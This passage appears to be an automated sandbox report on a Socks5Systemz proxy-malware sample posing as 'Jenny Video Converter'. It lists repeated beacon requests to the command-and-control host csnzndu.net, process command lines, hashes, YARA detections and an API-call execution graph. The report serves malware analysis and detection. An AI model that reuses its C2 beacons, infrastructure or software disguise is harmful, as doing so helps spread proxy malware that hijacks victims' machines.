                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          55192.168.2.750028185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:22.681663990 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:23.369059086 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:23 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          56192.168.2.750029185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:23.494518995 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:24.198865891 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:24 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          57192.168.2.750030185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:24.321857929 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:25.001676083 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:24 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          58192.168.2.750031185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:25.121279001 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:25.812244892 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:25 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          59192.168.2.750032185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:25.931374073 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:26.649319887 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:26 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          60192.168.2.750033185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:26.776036024 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:27.484219074 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:27 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          61192.168.2.750034185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:27.603534937 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:28.290227890 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:28 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          62192.168.2.750035185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:28.617397070 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:29.298161030 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:29 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          63192.168.2.750036185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:29.554301023 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:30.255186081 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:30 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          64192.168.2.750037185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:30.373079062 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:31.058501005 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:30 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          65192.168.2.750038185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:31.183280945 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:31.871372938 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:31 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          66192.168.2.750039185.208.158.248805936C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 7, 2024 13:28:31.997486115 CEST326OUTGET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1
                                                                          Host: csnzndu.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Oct 7, 2024 13:28:32.694250107 CEST220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Mon, 07 Oct 2024 11:28:32 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:07:26:25
                                                                          Start date:07/10/2024
                                                                          Path:C:\Users\user\Desktop\ZFllSoXpoT.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\ZFllSoXpoT.exe"
                                                                          Imagebase:0x400000
                                                                          File size:4'517'785 bytes
                                                                          MD5 hash:D4D88602D5675D2A3DA77CA8AC8F3293
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:2
                                                                          Start time:07:26:26
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\System32\svchost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                          Imagebase:0x7ff7b4ee0000
                                                                          File size:55'320 bytes
                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:07:26:26
                                                                          Start date:07/10/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp" /SL5="$10408,4236485,54272,C:\Users\user\Desktop\ZFllSoXpoT.exe"
                                                                          Imagebase:0x400000
                                                                          File size:709'120 bytes
                                                                          MD5 hash:C6A64497A14D9C70B36107218E969B1F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 3%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:4
                                                                          Start time:07:26:29
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\System32\SgrmBroker.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                          Imagebase:0x7ff7861b0000
                                                                          File size:329'504 bytes
                                                                          MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:5
                                                                          Start time:07:26:29
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\System32\svchost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                          Imagebase:0x7ff7b4ee0000
                                                                          File size:55'320 bytes
                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:6
                                                                          Start time:07:26:30
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\System32\svchost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                          Imagebase:0x7ff7b4ee0000
                                                                          File size:55'320 bytes
                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:7
                                                                          Start time:07:26:30
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\System32\svchost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                                                          Imagebase:0x7ff7b4ee0000
                                                                          File size:55'320 bytes
                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:8
                                                                          Start time:07:26:30
                                                                          Start date:07/10/2024
                                                                          Path:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe" -i
                                                                          Imagebase:0x400000
                                                                          File size:3'350'528 bytes
                                                                          MD5 hash:5C125A0FB6A9C14E6767045117CEBEC4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000008.00000002.2564448178.0000000002D75000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:10
                                                                          Start time:09:14:06
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\System32\svchost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                          Imagebase:0x7ff7b4ee0000
                                                                          File size:55'320 bytes
                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:12
                                                                          Start time:09:14:30
                                                                          Start date:07/10/2024
                                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                          Imagebase:0x7ff6fee10000
                                                                          File size:468'120 bytes
                                                                          MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:09:14:30
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff75da10000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:21%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:2.4%
                                                                            Total number of Nodes:1498
                                                                            Total number of Limit Nodes:22
                                                                            execution_graph 4984 409c40 5025 4030dc 4984->5025 4986 409c56 5028 4042e8 4986->5028 4988 409c5b 5031 40457c GetModuleHandleA GetProcAddress 4988->5031 4994 409c6a 5048 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4994->5048 5011 409d43 5110 4074a0 5011->5110 5013 409d05 5013->5011 5143 409aa0 5013->5143 5014 409d84 5114 407a28 5014->5114 5015 409d69 5015->5014 5016 409aa0 4 API calls 5015->5016 5016->5014 5018 409da9 5124 408b08 5018->5124 5022 409def 5023 408b08 21 API calls 5022->5023 5024 409e28 5022->5024 5023->5022 5153 403094 5025->5153 5027 4030e1 GetModuleHandleA GetCommandLineA 5027->4986 5030 404323 5028->5030 5154 403154 5028->5154 5030->4988 5032 404598 5031->5032 5033 40459f GetProcAddress 5031->5033 5032->5033 5034 4045b5 GetProcAddress 5033->5034 5035 4045ae 5033->5035 5036 4045c4 SetProcessDEPPolicy 5034->5036 5037 4045c8 5034->5037 5035->5034 5036->5037 5038 4065b8 5037->5038 5167 405c98 5038->5167 5047 406604 6FDA1CD0 5047->4994 5049 4090f7 5048->5049 5294 406fa0 SetErrorMode 5049->5294 5054 403198 4 API calls 5055 40913c 5054->5055 5056 409b30 GetSystemInfo VirtualQuery 5055->5056 5057 409be4 5056->5057 5060 409b5a 5056->5060 5062 409768 5057->5062 5058 409bc5 VirtualQuery 5058->5057 5058->5060 5059 409b84 VirtualProtect 5059->5060 5060->5057 5060->5058 5060->5059 5061 409bb3 VirtualProtect 5060->5061 5061->5058 5304 406bd0 GetCommandLineA 5062->5304 5064 409825 5066 4031b8 4 API calls 5064->5066 5065 406c2c 6 API calls 5069 409785 5065->5069 5067 40983f 5066->5067 5070 406c2c 5067->5070 5068 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5068->5069 5069->5064 5069->5065 5069->5068 5071 406c53 GetModuleFileNameA 5070->5071 5072 406c77 GetCommandLineA 5070->5072 5073 403278 4 API calls 5071->5073 5074 406c7c 5072->5074 5075 406c75 5073->5075 5076 406c81 5074->5076 5077 406af0 4 API calls 5074->5077 5080 406c89 5074->5080 5078 406ca4 5075->5078 5079 403198 4 API calls 5076->5079 5077->5074 5081 403198 4 API calls 5078->5081 5079->5080 5082 40322c 4 API calls 5080->5082 5083 406cb9 5081->5083 5082->5078 5084 4031e8 5083->5084 5085 4031ec 5084->5085 5086 4031fc 5084->5086 5085->5086 5088 403254 4 API calls 5085->5088 5087 403228 5086->5087 5089 4025ac 4 API calls 5086->5089 5090 4074e0 5087->5090 5088->5086 5089->5087 5091 4074ea 5090->5091 5325 407576 5091->5325 5328 407578 5091->5328 5092 407516 5093 40752a 5092->5093 5331 40748c GetLastError 5092->5331 5097 409bec FindResourceA 5093->5097 5098 409c01 5097->5098 5099 409c06 SizeofResource 5097->5099 5100 409aa0 4 API calls 5098->5100 5101 409c13 5099->5101 5102 409c18 LoadResource 5099->5102 5100->5099 5103 409aa0 4 API calls 5101->5103 5104 409c26 5102->5104 5105 409c2b LockResource 5102->5105 5103->5102 5106 409aa0 4 API calls 5104->5106 5107 409c37 5105->5107 5108 409c3c 5105->5108 5106->5105 5109 409aa0 4 API calls 5107->5109 5108->5013 5140 407918 5108->5140 5109->5108 5111 4074b4 5110->5111 5112 4074c4 5111->5112 5113 4073ec 20 API calls 5111->5113 5112->5015 5113->5112 5115 407a35 5114->5115 5116 405880 4 API calls 5115->5116 5117 407a89 5115->5117 5116->5117 5118 407918 InterlockedExchange 5117->5118 5119 407a9b 5118->5119 5120 405880 4 API calls 5119->5120 5121 407ab1 5119->5121 5120->5121 5122 405880 4 API calls 5121->5122 5123 407af4 5121->5123 5122->5123 5123->5018 5128 408b82 5124->5128 5135 408b39 5124->5135 5125 408bcd 5439 407cb8 5125->5439 5127 408be4 5131 4031b8 4 API calls 5127->5131 5128->5125 5130 4034f0 4 API calls 5128->5130 5136 4031e8 4 API calls 5128->5136 5137 403420 4 API calls 5128->5137 5139 407cb8 21 API calls 5128->5139 5130->5128 5134 408bfe 5131->5134 5132 403420 4 API calls 5132->5135 5133 4031e8 4 API calls 5133->5135 5150 404c10 5134->5150 5135->5128 5135->5132 5135->5133 5138 407cb8 21 API calls 5135->5138 5430 4034f0 5135->5430 5136->5128 5137->5128 5138->5135 5139->5128 5465 4078c4 5140->5465 5144 409ac1 5143->5144 5145 409aa9 5143->5145 5147 405880 4 API calls 5144->5147 5146 405880 4 API calls 5145->5146 5148 409abb 5146->5148 5149 409ad2 5147->5149 5148->5011 5149->5011 5151 402594 4 API calls 5150->5151 5152 404c1b 5151->5152 5152->5022 5153->5027 5155 403164 5154->5155 5156 40318c TlsGetValue 5154->5156 5155->5030 5157 403196 5156->5157 5158 40316f 5156->5158 5157->5030 5162 40310c 5158->5162 5160 403174 TlsGetValue 5161 403184 5160->5161 5161->5030 5163 403120 LocalAlloc 5162->5163 5164 403116 5162->5164 5165 40313e TlsSetValue 5163->5165 5166 403132 5163->5166 5164->5163 5165->5166 5166->5160 5239 405930 5167->5239 5170 405270 GetSystemDefaultLCID 5174 4052a6 5170->5174 5171 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5171->5174 5172 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5172->5174 5173 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5173->5174 5174->5171 5174->5172 5174->5173 5175 405308 5174->5175 5176 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5175->5176 5177 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5175->5177 5178 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5175->5178 5179 40538b 5175->5179 5176->5175 5177->5175 5178->5175 5272 4031b8 5179->5272 5182 4053b4 GetSystemDefaultLCID 5276 4051fc GetLocaleInfoA 5182->5276 5185 4031e8 4 API calls 5186 4053f4 5185->5186 5187 4051fc 5 API calls 5186->5187 5188 405409 5187->5188 5189 4051fc 5 API calls 5188->5189 5190 40542d 5189->5190 5282 405248 GetLocaleInfoA 5190->5282 5193 405248 GetLocaleInfoA 5194 40545d 5193->5194 5195 4051fc 5 API calls 5194->5195 5196 405477 5195->5196 5197 405248 GetLocaleInfoA 5196->5197 5198 405494 5197->5198 5199 4051fc 5 API calls 5198->5199 5200 4054ae 5199->5200 5201 4031e8 4 API calls 5200->5201 5202 4054bb 5201->5202 5203 4051fc 5 API calls 5202->5203 5204 4054d0 5203->5204 5205 4031e8 4 API calls 5204->5205 5206 4054dd 5205->5206 5207 405248 GetLocaleInfoA 5206->5207 5208 4054eb 5207->5208 5209 4051fc 5 API calls 5208->5209 5210 405505 5209->5210 5211 4031e8 4 API calls 5210->5211 5212 405512 5211->5212 5213 4051fc 5 API calls 5212->5213 5214 405527 5213->5214 5215 4031e8 4 API calls 5214->5215 5216 405534 5215->5216 5217 4051fc 5 API calls 5216->5217 5218 405549 5217->5218 5219 405566 5218->5219 5220 405557 5218->5220 5222 40322c 4 API calls 5219->5222 5290 40322c 5220->5290 5223 405564 5222->5223 5224 4051fc 5 API calls 5223->5224 5225 405588 5224->5225 5226 4055a5 5225->5226 5227 405596 5225->5227 5229 403198 4 API calls 